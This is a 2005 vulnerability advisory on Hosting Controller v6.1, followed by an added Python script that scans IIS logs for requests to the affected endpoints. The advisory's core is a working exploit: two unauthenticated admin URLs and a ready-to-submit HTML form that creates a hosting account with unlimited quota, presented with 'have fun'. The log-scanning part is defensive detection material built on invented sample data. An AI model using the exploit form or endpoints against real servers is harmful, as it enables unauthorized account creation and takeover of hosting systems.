
Bug Hosting Controller New (v6.1 - Hotfix 2.1)



-= KeHieuHoc - HCE GROUP =-

Information
-------------------------
Software Package : Hosting Controller

Vendor Homepage : http://www.hostingcontroller.com

Platforms : Windows based servers

Vulnerability : Multiple unauthenticated information disclosure

Risk : high

Vulnerable Versions : All versions ( Tested on: v6.1 Hotfix 2.1 )

Vendor Contacted : 09/07/2005

Release Date : 11/07/2005



Summary

------------

Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform.

(I)

You can create a new account on Hosting Controller

Exploit :

http://[target]/admin/hosting/addsubsite_online.asp

Code Form:

<FORM action="http://[target]/admin/hosting/addsubsite_online.asp" method="post">
<INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1">
Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR>
Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR>
<INPUT type="hidden" name="Quota" value="-1" id="Hidden4">
<INPUT type="hidden" name="htype" value="27" id="htype5" >
<INPUT type="hidden" name="choice" value="1" id="Hidden6" >
Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR>
<input type="submit" value="Make">
</FORM> 



(II)

You can create any "session" that is special to the system owner

Exploit :

http://[target]/admin/hosting/dsp_newreseller.asp


(I) and (II) -> have fun 

 
 


Solution

----------



The vendor was notified and has released a patch.

Update your software.



Credits

---------

Discovered on 9 July 2005 by KeHieuHoc - HCE Group


Email: kehieuhoc@xxxxxxxxx

 

References

-------------



http://hcegroup.net

 

------------------------------ // KeHieuHoc - HCE Group \\ ------------------------------
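
For checking whether a server that ran an unpatched version received such requests, the following added example (not part of the original advisory) scans an IIS W3C extended log for the two endpoints named in (I) and (II) and marks requests that arrived with no Referer or with a Referer on another host. The sample log, its host names and addresses, and the off-site Referer heuristic are assumptions made for illustration.

```python
from urllib.parse import urlsplit

# Endpoints named in the advisory; IIS matches paths case-insensitively.
WATCHED = {"/admin/hosting/addsubsite_online.asp",
           "/admin/hosting/dsp_newreseller.asp"}

# Constructed sample log (hosts, IPs and timestamps are invented).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status cs-host cs(Referer)
2005-07-12 10:01:02 192.0.2.10 GET /images/logo.gif 200 panel.example.test -
2005-07-12 10:02:11 198.51.100.7 POST /admin/hosting/addsubsite_online.asp 200 panel.example.test -
2005-07-12 10:03:40 198.51.100.7 GET /Admin/Hosting/dsp_newreseller.asp 200 panel.example.test http://other.example.test/f.html
2005-07-12 10:04:10 198.51.100.7 GET /admin/hosting/dsp_newreseller.asp
2005-07-12 10:05:00 192.0.2.10 GET /admin/hosting/dsp_newreseller.asp 200 panel.example.test http://panel.example.test/admin/
"""

def scan_iis_log(text):
    """Return one finding per request to a watched endpoint."""
    fields, findings = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column order may change mid-file
            continue
        values = line.split()
        if line.startswith("#") or not fields or len(values) != len(fields):
            continue                       # directive, or truncated record
        rec = dict(zip(fields, values))
        path = rec.get("cs-uri-stem", "").lower()
        if path not in WATCHED:
            continue
        referer = rec.get("cs(Referer)", "-")
        ref_host = urlsplit(referer).hostname or ""
        # Heuristic (assumption): a form served from another site, as in the
        # advisory, arrives with no Referer or one naming a different host.
        offsite = ref_host != rec.get("cs-host", "-").lower().split(":")[0]
        findings.append({"when": f"{rec.get('date')} {rec.get('time')}",
                         "client": rec.get("c-ip"),
                         "method": rec.get("cs-method"),
                         "path": path,
                         "status": rec.get("sc-status"),
                         "offsite": offsite})
    return findings

if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG):
        print(f)
```

The cs-host and cs(Referer) columns are only present when those fields are enabled in the site's logging settings; without them every hit is reported as off-site and needs manual review.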